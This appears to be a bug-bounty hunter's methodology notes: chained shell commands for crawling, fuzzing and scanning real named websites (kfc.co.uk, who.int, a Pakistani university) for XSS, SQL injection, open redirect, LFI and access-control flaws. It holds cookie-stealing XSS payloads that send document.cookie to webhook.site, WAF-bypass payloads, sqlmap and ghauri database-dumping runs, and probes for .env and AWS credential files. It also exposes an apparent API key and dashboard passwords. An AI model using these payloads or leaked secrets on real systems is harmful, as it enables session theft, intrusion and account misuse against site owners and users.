My Concept

reflix -l urls.txt -w /home/bugbounty-wordlists/raft-large-words-lowercase.txt -X GET,POST -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0" -o t.txt -po params.txt -c 15 -hd -p nexovir -d --dom --heavy -xt

Find Generic Vulnerabilities

./xray_linux_amd64 ws --basic https://www.webucate.in --plugin xss,sqldet,cmd-injection,path-traversal,redirect

for i in $(cat target.txt); do ./xray_linux_amd64 ws --basic-crawler $i --plugins xss,sqldet,cmd-injection,redirect,path-traversal --html-output "$(date +%T).html"; done

Find Broken Access Control

1. Numbers of Web Assets in scope.

2. Filter with httpx.

Select Unauthenticated Domains

cat livesubdomains.txt | httpx -mc 403 -title -sc -td -server -location && cat livesubdomains.txt | httpx -mc 401 -title -sc -td -server -location

1. After filtering, select an unauthenticated web application.

2. Fuzzing Directories with FFUF.

3. Most of the results 302 Redirect.

4. Run FFUF again with size filter.

5. Few Results came.

6. One of the result 302 Redirect -> /directory, when open it leads to /directory/v1/endpoint.svc

7. Use the Wsdler Burp extension to enumerate the endpoints.

8. Multiple endpoints execute successfully without authorization.

✅ Use the -fs filter in FFUF to exclude responses with the same size, making it easier to spot unique and interesting findings.

Find OS Command Injection

Search Reflected GET and POST Parameters
inject: &whoami or |whoami
then hit CTRL+F and searched whoami
if you Not Found whoami so its mean vulnerable to OS Command Injection
To confirm injected: &ls , &dir or |ls , |dir

XSS Hunting

1

Nuclei

cat endpoints.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

2

xoxo Method

cat endpoints.txt | grep '=' | sort -u > param.txt && urless -i param.txt -o xss-ready.txt && cat xss-ready.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

3

httpx + Gxss + Kxss = Coffin Method

cat endpoints.txt | grep '=' | uro | httpx-toolkit -ct -silent -nc | grep -i -E "text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml|application/html|application/xml" | cut -d '[' -f 1 | Gxss | kxss

Friend Method

cat livesubdomains.txt | waybackurls | anew wayback.txt && katana -u livesubdomains.txt -jc 3 -d 5 -o katana.txt && cat livesubdomains.txt | gau | anew gau.txt && urlfinder -list livesubdomains.txt -o urlfinder.txt && cat wayback.txt katana.txt gau.txt urlfinder.txt | sort -u | anew allurls.txt && cat allurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt|eot|ttf)" | anew filter_urls_1.txt && cat filter_urls_1.txt | grep -e "=" | anew param_1.txt && p1radup -i param_1.txt -o param_2.txt && cat param_2.txt | httpx | anew live_parameters.txt && cat live_parameters.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single 

4

Blind XSS

cat endpoints.txt  | grep -aE '\?.*=.*(&.*)?' | uro | bxss -t -X GET -pf bxss-payloads.txt

5

----------------------------------------------------

Find XSS on GET and POST Parameters

./xray_linux_amd64 ws -url-file endpoints.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect --html-output Generic-Vulnerabilities

----------------------------------------------------

Bruteforce Method - Find Hidden Endpoints and then Prameters

6

Bruteforce Method - Find Hidden Endpoints and the Prameters

cat livesubdomains.txt | httpx-toolkit -td -sc -silent -location | grep -Ei 'asp|php|java|jsp|jspx|aspx'
cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  PHP  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep -i ASP && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep Java && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep CFML  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  Perl

7

PHP

ffuf -u https://dv.ue.edu.pk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -recursion -recursion-depth 7 -v -mc 200 -e .js,.svc,.php,.html,.xhtm,.htm,.htn -rate 50 -t 50200

ASP.NET

ffuf -u https://dv.ue.edu.pk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -recursion -recursion-depth 7 -v -mc 200 -e .js,.svc,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx -rate 50 -t 50200

8

JAVA

ffuf -u https://dv.ue.edu.pk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -recursion -recursion-depth 7 -mc 200 -e .js,.svc,.jsp,.jspx,.jsf,.jspa,.do,.pml,.action,.act,.pl -rate 50 -t 50200

9

----------------------------------------------------

Find Hidden Prameters on Bruteforced Endpoints

10

Arjun Find Hidden Prameters on Bruteforced Endpoints

arjun -i endpoints.txt -oT arjun.txt && cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a check.txt && cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single 

x8 Find Hidden Prameters on Bruteforced Endpoints

x8 -u endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a check.txt && cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

11

Find SQL Injection

./xray_linux_amd64 ws -url-file check.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

12

----------------------------------------------------

Find Hidden endpoints in JS Files for then Bruteforce Prameters

13

Find Hidden endpoints in JS Files for Bruteforce Prameters

cat endpoints.txt | grep "js$" | tee jsfiles.txt && cat jsfiles.txt | httpx -mc 200 | python3 /home/kali/tools/JSA/jsa.py

14

arjun -i js-endpoints.txt -oT js-arjun.txt && cat js-arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a js-check.txt && cat js-check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

x8 -u js-endpoints.txt -w /parameters.txt -X GET -o js-x8.txt && cat js-x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a js-check.txt %% cat js-check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

15

./xray_linux_amd64 ws -url-file js-check.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

16

curl -s https://www.pcmmod.com/js/utils/web_calls.js | grep -aoP "(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))" | sort -u

17

--------------------------------------------------------

Find Hidden endpoints in robots.txt for Bruteforce Prameters

18

Find Hidden endpoints in robots.txt for Bruteforce Prameters

httpx-toolkit -l livesubdomains.txt -path /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt); do base=$(echo "$url" | sed 's/\/robots\.txt$//'); curl -s "$url" | grep -i 'Disallow' | awk '{print $2}' | sed 's#^/##' | while read path; do echo "$base/$path" | sed 's#//#/#g' | anew robot-words.txt; done; done

19

arjun -i robots-endpoints.txt -oT robots-arjun.txt && cat robots-arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a robots-check.txt && cat robots-check.txt  | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

20

x8 -u robots-endpoints.txt -w /parameters.txt -X GET -o robots-x8.txt && cat robots-x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a robots-check.txt %% cat robots-check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

21

./xray_linux_amd64 ws -url-file robots-check.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

--------------------------------------------------------

Arjun Find Hidden Prameters on First Extention Endpoints

22

Arjun Find Hidden Prameters on First Endpoints

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 -silent  | tee fuzz.txt && echo -e "Running Arjun to find first-Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun-first-ext-raw-endpoints.txt && cat arjun-first-ext-raw-endpoints.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee arjun-xss-first-ext-endpoints.txt && nuclei -l arjun-xss-first-ext-endpoints.txt -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single 

23

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 -silent  | tee fuzz.txt && echo -e "Running x8 to find first-Ext-Endpoints for Hidden Parameters..." && x8 -u x8_ext-endpoints.txt -w /parameters.txt -X GET -o x8-first-ext-raw-endpoints.txt && cat x8-first-ext-raw-endpoints.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a x8-xss-first-ext-endpoints.txt && cat x8-xss-first-ext-endpoints.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

./xray_linux_amd64 ws -url-file arjun-xss-first-ext-endpoints.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

24

./xray_linux_amd64 ws -url-file x8-xss-first-ext-endpoints.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

25

--------------------------------------------------------

26

x8 Find Hidden Prameters on Last Extention Endpoints

27

x8 Find Hidden Prameters on Last Extention Endpoints

echo -e "${PURPLE} Filtering Ext-Endpoint for Hidden Parameters with x8..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee x8-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with x8..." && cat x8-raw-endpoints.txt | uro | httpx -mc 200 -silent | tee x8_ext-endpoints.txt && echo -e "Running x8 to find Ext-Endpoints for Hidden Parameters..." && x8 -u x8_ext-endpoints.txt -w /parameters.txt -X GET -o x8_result_ext_endpoints.txt && cat x8_result_ext_endpoints.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a x8-xss.txt && cat x8-xss.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

28

Arjun Find Hidden Prameters on Last Extention Endpoints

echo -e "${PURPLE} Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee arjun-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun..." && cat arjun-raw-endpoints.txt | uro | httpx -mc 200 | tee arjun_ext-endpoints.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i arjun_ext-endpoints.txt -oT arjun_result_ext_endpoints.txt && cat arjun_result_ext_endpoints.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a arjun-xss.txt && nuclei -l arjun-xss.txt -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

29

./xray_linux_amd64 ws -url-file x8-xss.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

30

./xray_linux_amd64 ws -url-file arjun-xss.txt --plugin xss,sqldet,cmd-injection,path-traversal,redirect

31

--------------------------------------------------------

32

Find Vulnerable Prameters via Google Dorking

33

site:.who.int inurl:? | inurl:&

34

--------------------------------------------------------

Try XSS Payload on other endpoints with Same Vulnerable Parameter

ffuf -w endpoints.txt:URL -u 'URL?er=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E' -mc 200 -fs 0 -t 40 -v

--------------------------------------------------------

35

Try XSS Vulnerable Endpoints in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

ffuf -u "FUZZ/asad/..CFIDE/administrator/index.cfm" -w livesubdomains.txt -c -v

ffuf -w subdomains.txt -u FUZZ/vuln_endpoint -mc 200

36

ffuf -u "https://DOMAIN/PATH" -w livesubdomains.txt:DOMAIN -w masterdata.txt:PATH -mc 200

37

--------------------------------------------------------

Exploit & Bypass XSS

GET Method - URL with 1 parameter

curl https://api.knoxss.pro -d 'target=https://videohub.sbb.ch/esearch/search?keyword=asad' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

GET Method - URL with 2+ parameters => %26 between Parameters

curl https://api.knoxss.pro -d 'target=http://www.unesco.org/archives/multimedia/index.php?page=2%26pg=34%26pattern%26video=video' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

Authenticated GET Method - with Cookies

curl https://api.knoxss.pro -d 'target=https://x55.is/brutelogic/session/index.php?name=guest&auth=Cookie:PHPSESSID=9p77u90dssmkmn3kgmmgq3b5d3' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

38

Find Open Redirect

Scan Single Domain

echo http://testphp.vulnweb.com -all | gau | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

HTTPX

cat endpoints.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login\?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=|redirect_url=|redirect_to=|forward_to=|forward_url=|destination_url=|jump_to=|go_to=|goto_url=|target_url=|redirect_link=" | tee redirect_params.txt && cat endpoints.txt | gf redirect | uro | sort -u | tee -a redirect_params.txt && cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

39

CURL

cat redirect_params.txt | qsreplace "https://evil.com" | xargs -I {} curl -s -o /dev/null -w "%{url_effective} -> %{redirect_url}\n" {}

webhook

cat endpoints.txt | grep '='  | qsreplace //webhook.site/3dd0275d-a44e-4d19-82ff-e4182d345c45 > ssrf.txt && cat ssrf.txt | httpx -fr && split -l 10 ssrf.txt output_file_prefix

40

Bypass Method

cat redirect_params.txt | uro | while read url; do cat /loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "https://google.com"

41

Check DOM Based via Burp Pro

ffuf -w redirect_params.txt:PARAM -w /loxs/payloads/or.txt:PAYLOAD -u "PARAM=PAYLOAD" -mc 301,302,303,307,308 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -x http://172.22.128.1:8080 -t 10 -mr "Location: http://google.com"

Google Dorking Method

1) Sub Se Pehly in Dorks se URLS ko Jama karo.. 
2) Link Gopher Extention Use karo 
3) OR Sub URLS ko nano op.txt File me Save karo.. 
site:.*.com inurl:"=https" 
site:*.pk inurl:"redirectURL="
site:target (inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= | inurl:dest= | inurl:target= | inurl:redirect_uri= | inurl:redirect_url= | inurl:checkout_url= | inurl:continue= | inurl:return_path= | inurl:returnTo= | inurl:out= | inurl:go= | inurl:login?to= | inurl:origin= | inurl:callback_url= | inurl:jump= | inurl:action_url= | inurl:forward= | inurl:src= | inurl:http | inurl:&)
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:target
4) then Exploit karo: cat op.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
5) Double slash try karo: 
cat op.txt | qsreplace "//evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
6) Bypas try karo: 
cat op.txt | uro | while read url; do cat /loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "https://google.com"

42

Nuclei

cat endpoints.txt | grep '='  | nuclei -dast -t /home/kali/nucli/open-redirect.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single -c 30

43

Nuclei Generic

cat livesubdomains.txt | nuclei -t /home/kali/nucli/swagger/open-redirect-generic.yaml -c 30

44

Find Secrets and Endpoints in JS files

Extract JS URLs from all endpoints

cat endpoints.txt | grep -E "\.js$" | urldedupe | httpx -silent | sort -u > js_files.txt

Download JS Files for Offline Analysis

cat js_files.txt | xargs -n 1 wget -q

Extract all URLs from JS

cat js_files.txt | nuclei -t exposures/ --s info,high,critical,medium -es unknown -c 30

45

Extract Hidden API Paths

echo Extract Hidden API Paths && grep -RhoE "/api/[a-zA-Z0-9/_-]+" *.js | sort -u && echo Extract API versions && grep -RhoE "/v[0-9]+/" *.js | sort -u && echo Check which endpoints are alive && grep -RhoE "/api/[a-zA-Z0-9/_-]+" *.js | httpx -silent -mc 200

Extract Parameter names

grep -RhoE "[?&][a-zA-Z0-9_]+=" *.js | sort -u

46

Extract Hardcoded Secrets

grep -RiE "apikey|token|secret|auth|bearer|key" *.js

Extract cloud storage URLs

grep -RiE "s3.amazonaws.com|storage.googleapis.com|blob.core.windows.net" *.js

47

Find Sensitive Endpoints

cat livesubdomains.txt | while read host; do for path in /config.js /.aws/credentials /admin/config.json /config.json /app/config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.backup /config.php /phpinfo.php /.env.production /.git/config /api_keys.json /credentials.json /secrets.json /google-services.json /package.json /package-lock.json /composer.json /pom.xml /docker-compose.yml; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title

48

Misconfiguration checks

nuclei -tags misconfig -l katana.txt -rl 75 -es low,info -ss host-spray -H "Cookie: auth=123" -H "User-Agent: ..."

49

Chek Improper Access Controll

while IFS= read -r host; do
  host="${host%%[[:space:]]*}"         # trim trailing whitespace
  host="${host%/}"                     # remove trailing slash if present
  host=$(printf '%s' "$host" | tr -d '\r')  # remove stray CR
  [ -z "$host" ] && continue
  feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -W 0 \
    -x js,php,html,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl \
    -w /home/kali/common.txt -u "$host" -t 10 --rate-limit 1000 --time-limit 1m
done < livesubdomains.txt

Extract URLs from Text - Extract HTML Links - Online - Browserling Web Developer Toolswww.browserling.com

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://api.hoteltonight-test.com/FUZZ -mc 200 -H "Content-Type: application/json"

• dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.example.com -e js,svc,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl --full-url --max-rate=5 -i 200

• feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

• ffuf -u https://www.kfc.co.uk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -recursion -recursion-depth 7 -mc 200 -e .js,.svc,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.pml,.action,.act,.pl -rate 50 -t 50200

• 3:ThenFind vulnerable Endpointsof Both Domain according to tech and endpoint-extention: with Fuzzing used ffuf like error.php, demo.html, test.htm

• Run Fuzzing with feroxbuster

• Extract Domains

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 | tee fuzz.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' katana.txt | sort -u | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u | httpx -mc 200 | tee fuzz.txt

cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  PHP  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep -i ASP && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep Java && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep CFML  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  Perl

PHP

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

ASP.NET

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,html,xhtm,htm,htn,asp,aspx,ashx,asmx -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

JAVA

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,html,xhtm,htm,htn,jsp,jspx,jsf,jspa,do,action,act,pml -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

• 4:Then find the vulnerable Parameterswith Arjun or x8like error.php?code=xss

• Run Arjun On All Endpoints

arjun -i endpoints.txt -oT arjun.txt && cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a check.txt 

• Run x8 On All Endpoints with Assetnote parameters wordlist

x8 -u endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a check.txt

• 5:Quick confirm Vuln urls

cat check.txt | xargs -I % -P 25 sh -c 'x="%"; xu=$(echo "$x" | qsreplace "REFLECTED"); lu=$(echo "$x" | qsreplace "/etc/passwd"); curl -s "$xu" | grep -q "REFLECTED" && echo -e "\033[1;32m[+] XSS Possible\033[0m: $xu"; curl -s "$lu" | grep -q "root:x" && echo -e "\033[1;31m[+] LFI Possible\033[0m: $lu"'

cat check.txt | while read -r u; do f=$(curl -sL -o /dev/null -w "%{url_effective}" "$(echo "$u" | qsreplace 'https://evil.com')"); if [[ "$f" == "https://evil.com"* ]]; then echo -e "Original: $u\nFinal: \033[1;31m$f\033[0m\nStatus: \033[1;32mVULNERABLE\033[0m\n"; else echo -e "Original: $u\nFinal: $f\nStatus: \033[1;33mNOT VULNERABLE\033[0m\n"; fi; done

• 6:Then confirm html injection

cat check.txt | Gxss -p '">asad<hacked' && cat check.txt | Gxss | httpx -sc && cat check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee confirm-html-injection.txt

• 7:Then confirm Reflected XSS

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

cat check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt && cat confirm-xss.txt | qsreplace '"><Img Src=OnXSS OnError=(alert)(origin)>'

➡️ RXSS CloudFlare
";globalThis.alert(document.cookie);//
\">K='><Svg/OnLoad=(confirm)(origin)>
'"/><Img Src=OnXSS OnError=(alert)(1)>
'"/><SVG/oNlY=1 ONlOAD=confirm(document.domain)>

➡️ DOM CloudFlare
'-alert?.(1)-' 
ja.va.sc.ri.pt.:al.er.t(or.ig.in)//evil.com
')[alert][0].call(this,document["cookie"])//
javascript://target.com/%E2%80%A8alert(1)
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)

➡️ CMD CloudFlare
cat /e${hahaha}tc/${heywaf}pas${catchthis}swd

➡️ Imperva
'"><Image Src=//X55.is OnLoad%0C=import(Src)//

➡️ Akamai
'"><A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1)>

• 8:Find XSS Vulnerable Endpoint in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

ffuf -u "FUZZ/asad/..CFIDE/administrator/index.cfm" -w livesubdomains.txt -c -v

ffuf -u "https://DOMAIN/PATH" -w livesubdomains.txt:DOMAIN -w masterdata.txt:PATH -mc 200

• 9:Reflected XSS toAccount Take Over

• https://xss.report/dashboard swagpk Synack@3434

• https://bxsshunter.com/dashboard Synack@3434

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

• 10:Then confirmSQL injection

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/sqli/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1"

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --batch --banner --current-db --level 3
done < check.txt


while read url; do
    echo "Testing URL: $url"
    yes n | sqlmap -u "$url" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment
done < check.txt

Manual Confirm

'||1==1--+-
"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

cat check.txt | gf sqli > check-sql.txt; sqlmap -m check-sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a confirm-sqli.txt

ghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent -v3 --level=3 risk=3

• 11:Then confirmOpen Redirect

cat check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location -fr -mr "evil.com"

cat check.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -location -fr -mr "evil.com"

cat check.txt | qsreplace "///evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

Check with wordlist

cat check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

• 12:Then confirm Local file inclusion (LFI)

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/lfi/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

